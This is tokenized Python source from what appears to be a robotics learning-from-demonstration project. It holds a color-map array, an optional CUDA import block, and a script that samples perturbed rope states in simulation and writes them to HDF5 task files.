<EOL> rgbs = ( np . random . rand ( max_label + <NUM_LIT:1> , <NUM_LIT:3> ) * <NUM_LIT> ) . astype ( '<STR_LIT>' ) <EOL> return rgbs [ labels ] <EOL> def inttuple ( x , y ) : <EOL> return int ( np . round ( x ) ) , int ( np . round ( y ) ) <EOL> def circle_with_ori ( img , x , y , theta ) : <EOL> cv2 . circle ( img , inttuple ( x , y ) , <NUM_LIT> , ( <NUM_LIT:0> , <NUM_LIT:255> , <NUM_LIT:255> ) , <NUM_LIT:3> ) <EOL> cv2 . line ( img , inttuple ( x , y ) , inttuple ( x + <NUM_LIT> * np . cos ( theta ) , y + <NUM_LIT> * np . sin ( theta ) ) , ( <NUM_LIT:0> , <NUM_LIT:255> , <NUM_LIT:255> ) , <NUM_LIT:3> ) <EOL> CM_JET = np . 
array ( [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:255> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:8> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:12> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:16> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:20> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ 
<NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:32> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:64> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:100> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] 
, <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:255> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:8> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ 
<NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , 
<NUM_LIT:15> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:12> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:8> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:5> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:2> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:255> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:200> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , 
<NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:100> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:255> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:7> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , 
<NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ] ] , dtype = np . uint8 ) </s>
<s> try : <EOL> import pycuda . autoinit <EOL> import scikits . cuda . linalg <EOL> scikits . cuda . linalg . init ( ) <EOL> _has_cuda = True <EOL> _has_cula = scikits . cuda . linalg . _has_cula <EOL> except ( ImportError , OSError ) : <EOL> _has_cuda = False <EOL> _has_cula = False </s>
<s> from __future__ import division <EOL> import time <EOL> import os . path <EOL> import h5py <EOL> import atexit <EOL> import random <EOL> import sys <EOL> import trajoptpy <EOL> import numpy as np <EOL> from lfd . environment import sim_util <EOL> from lfd . environment . simulation import DynamicSimulation <EOL> from lfd . environment . simulation_object import BoxSimulationObject , RopeSimulationObject <EOL> from lfd . rapprentice import util <EOL> from lfd . rapprentice import task_execution , rope_initialization <EOL> from lfd . rapprentice . util import redprint <EOL> class GlobalVars : <EOL> exec_log = None <EOL> actions = None <EOL> actions_cache = None <EOL> def replace_rope ( sim , new_rope , animation ) : <EOL> rope_sim_obj = None <EOL> for sim_obj in sim . sim_objs : <EOL> if isinstance ( sim_obj , RopeSimulationObject ) : <EOL> rope_sim_obj = sim_obj <EOL> break <EOL> if rope_sim_obj : <EOL> sim . remove_objects ( [ rope_sim_obj ] ) <EOL> rope = RopeSimulationObject ( "<STR_LIT>" , new_rope , sim_util . RopeParams ( ) ) <EOL> sim . add_objects ( [ rope ] ) <EOL> sim . settle ( step_viewer = animation ) <EOL> def load_random_start_segment ( demofile ) : <EOL> start_keys = [ seg for seg in GlobalVars . actions . keys ( ) if '<STR_LIT>' in seg ] <EOL> seg_name = random . choice ( start_keys ) <EOL> return ( GlobalVars . actions [ seg_name ] [ '<STR_LIT>' ] , seg_name ) <EOL> def sample_rope_state ( demofile , sim , animation , human_check = False , <EOL> perturb_points = <NUM_LIT:7> , min_rad = <NUM_LIT:0.1> , max_rad = <NUM_LIT:0.1> ) : <EOL> success = False <EOL> while not success : <EOL> new_xyz , demo_id = load_random_start_segment ( demofile ) <EOL> perturb_radius = random . uniform ( min_rad , max_rad ) <EOL> rope_nodes = rope_initialization . find_path_through_point_cloud ( new_xyz , <EOL> perturb_peak_dist = perturb_radius , <EOL> num_perturb_points = perturb_points ) <EOL> replace_rope ( sim , rope_nodes , animation ) <EOL> sim . 
settle ( ) <EOL> if animation : <EOL> sim . viewer . Step ( ) <EOL> if human_check : <EOL> resp = raw_input ( "<STR_LIT>" ) <EOL> success = resp not in ( '<STR_LIT:N>' , '<STR_LIT:n>' ) <EOL> else : <EOL> success = True <EOL> return ( rope_nodes , demo_id ) <EOL> def gen_task_file ( args , sim , rotation_angle = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> taskfile = h5py . File ( args . gen_tasks . taskfile , '<STR_LIT:w>' ) <EOL> actionfile = h5py . File ( args . gen_tasks . actionfile , '<STR_LIT:r>' ) <EOL> try : <EOL> for i in range ( args . gen_tasks . n_examples ) : <EOL> redprint ( '<STR_LIT>' . format ( i , args . gen_tasks . n_examples ) ) <EOL> ( rope_nodes , demo_id ) = sample_rope_state ( actionfile , sim , <EOL> args . animation , <EOL> human_check = args . interactive , <EOL> perturb_points = args . gen_tasks . n_perturb_pts , <EOL> min_rad = args . gen_tasks . min_rad , <EOL> max_rad = args . gen_tasks . max_rad ) <EOL> taskfile . create_group ( str ( i ) ) <EOL> taskfile [ str ( i ) ] [ '<STR_LIT>' ] = rope_nodes <EOL> taskfile [ str ( i ) ] [ '<STR_LIT>' ] = str ( demo_id ) <EOL> taskfile . create_group ( '<STR_LIT:args>' ) <EOL> taskfile [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] = args . gen_tasks . n_examples <EOL> taskfile [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] = args . gen_tasks . actionfile <EOL> taskfile [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] = ( args . gen_tasks . min_rad , <EOL> args . gen_tasks . max_rad ) <EOL> taskfile [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] = args . gen_tasks . n_perturb_pts <EOL> taskfile [ '<STR_LIT:args>' ] [ '<STR_LIT>' ] = float ( rotation_angle ) <EOL> print '<STR_LIT>' <EOL> except : <EOL> print '<STR_LIT>' , sys . exc_info ( ) <EOL> raise <EOL> finally : <EOL> taskfile . close ( ) <EOL> actionfile . close ( ) <EOL> assert check_task_file ( args . gen_tasks . taskfile , args . gen_tasks . n_examples ) <EOL> def check_task_file ( fname , n_examples ) : <EOL> """<STR_LIT>""" <EOL> f = h5py . 
File ( fname , '<STR_LIT:r>' ) <EOL> success = True <EOL> for i in range ( n_examples ) : <EOL> if str ( i ) not in f : <EOL> print '<STR_LIT>' . format ( fname , i ) <EOL> success = False <EOL> f . close ( ) <EOL> return success <EOL> def parse_input_args ( ) : <EOL> parser = util . ArgumentParser ( ) <EOL> parser . add_argument ( "<STR_LIT>" , type = int , default = <NUM_LIT:0> , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , type = str , <EOL> default = '<STR_LIT>' ) <EOL> parser . add_argument ( "<STR_LIT>" , type = str , <EOL> default = '<STR_LIT>' ) <EOL> parser . add_argument ( "<STR_LIT>" , type = int , default = None ) <EOL> parser . add_argument ( "<STR_LIT>" , type = str , default = "<STR_LIT>" ) <EOL> subparsers = parser . add_subparsers ( dest = '<STR_LIT>' ) <EOL> parser_eval = subparsers . add_parser ( '<STR_LIT>' ) <EOL> parser_eval . add_argument ( '<STR_LIT>' , type = str , nargs = '<STR_LIT:?>' , <EOL> default = '<STR_LIT>' ) <EOL> parser_eval . add_argument ( '<STR_LIT>' , type = str , nargs = '<STR_LIT:?>' ) <EOL> parser_eval . add_argument ( "<STR_LIT>" , type = str , default = '<STR_LIT>' ) <EOL> parser_eval . add_argument ( "<STR_LIT>" , type = float , nargs = <NUM_LIT:6> , <EOL> metavar = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> default = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> help = "<STR_LIT>" ) <EOL> parser_eval . add_argument ( "<STR_LIT>" , type = int , default = <NUM_LIT:100> ) <EOL> parser_eval . add_argument ( "<STR_LIT>" , type = float , default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser_eval . add_argument ( "<STR_LIT>" , type = float , default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser_eval . 
add_argument ( "<STR_LIT>" , type = int , default = <NUM_LIT:5> , <EOL> help = "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> if not args . animation : <EOL> args . plotting = <NUM_LIT:0> <EOL> return args <EOL> def setup_log_file ( args ) : <EOL> if args . log : <EOL> redprint ( "<STR_LIT>" % args . log ) <EOL> GlobalVars . exec_log = task_execution . ExecutionLog ( args . log ) <EOL> atexit . register ( GlobalVars . exec_log . close ) <EOL> GlobalVars . exec_log ( <NUM_LIT:0> , "<STR_LIT>" , args ) <EOL> def set_global_vars ( args ) : <EOL> if args . random_seed is not None : np . random . seed ( args . random_seed ) <EOL> GlobalVars . actions = h5py 